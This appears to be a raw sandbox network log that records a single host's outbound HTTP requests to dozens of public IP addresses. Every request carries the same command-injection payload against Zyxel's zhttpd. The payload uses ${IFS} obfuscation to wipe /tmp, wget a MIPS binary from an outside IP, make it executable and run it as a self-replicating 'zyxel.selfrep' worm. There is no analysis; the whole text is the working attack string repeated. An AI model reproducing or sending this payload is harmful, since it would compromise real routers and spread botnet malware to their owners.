                                            Jan 14, 2024 15:50:31.265512943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1938192.168.2.2350110202.88.229.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265558958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1939192.168.2.234089850.130.154.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265590906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1940192.168.2.235889834.136.115.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265618086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1941192.168.2.2336372141.228.195.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265660048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1942192.168.2.234175420.229.128.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265701056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1943192.168.2.2359324166.200.24.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265733004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1944192.168.2.234801257.220.148.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265757084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1945192.168.2.2354792122.17.56.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265780926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1946192.168.2.2360264198.219.54.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265832901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1947192.168.2.235214469.244.11.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265853882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1948192.168.2.2342358156.191.74.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265877008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1949192.168.2.2348088113.49.42.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265892982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1950192.168.2.235468646.139.24.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265913963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1951192.168.2.234564637.118.226.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265949965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1952192.168.2.2354440217.236.143.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.265990973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1953192.168.2.23499364.181.76.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266019106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1954192.168.2.235418252.114.49.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266048908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1955192.168.2.2357970171.163.174.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266052008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1956192.168.2.2341222119.97.29.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266083002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1957192.168.2.2339344153.195.196.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266119957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1958192.168.2.2338226123.230.176.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266129017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1959192.168.2.236003091.184.243.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266185999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1960192.168.2.2335502117.135.5.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266215086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1961192.168.2.2342308109.59.211.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266220093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1962192.168.2.234475496.95.200.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266237020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1963192.168.2.2358920147.12.48.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266279936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1964192.168.2.2334932190.161.114.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266309977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1965192.168.2.2356044101.230.47.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266340017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1966192.168.2.233986663.54.205.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266371965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1967192.168.2.2355332180.7.248.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266397953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1968192.168.2.233589698.178.142.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266443968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1969192.168.2.2359858139.37.85.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266455889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1970192.168.2.2342134113.194.199.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266473055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1971192.168.2.234812624.214.11.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266509056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1972192.168.2.234301474.16.128.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266539097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1973192.168.2.2343804223.190.17.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266541004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1974192.168.2.2356590114.39.145.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266566992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1975192.168.2.2336822143.60.211.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266608000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1976192.168.2.2344834161.81.235.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266633987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1977192.168.2.233290885.86.72.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266642094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1978192.168.2.234972437.142.214.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266680002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1979192.168.2.2360276223.87.91.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266705036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1980192.168.2.2342774223.204.11.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266746044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1981192.168.2.2354090207.230.97.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266779900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1982192.168.2.2337960151.176.4.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266819954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1983192.168.2.2356956222.220.102.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266834974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1984192.168.2.2343334125.50.4.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266865015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1985192.168.2.2356612162.62.116.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266896009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1986192.168.2.2345510116.64.237.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266921043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1987192.168.2.2357962136.218.74.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266964912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1988192.168.2.234030086.191.204.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.266973972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1989192.168.2.2342406138.122.49.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267004967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1990192.168.2.23579182.93.129.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267056942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1991192.168.2.2339908166.114.39.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267103910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1992192.168.2.2342062213.73.213.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267103910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1993192.168.2.2346074141.153.56.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267132998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1994192.168.2.235269085.170.63.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267172098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1995192.168.2.2360278125.206.73.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267210007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1996192.168.2.2348082162.131.188.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267263889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1997192.168.2.2348444205.239.110.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267265081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1998192.168.2.234811482.148.42.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267277002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1999192.168.2.2349322204.40.221.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.267318964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2000192.168.2.23587869.63.53.189443
                                            TimestampBytes transferredDirectionData
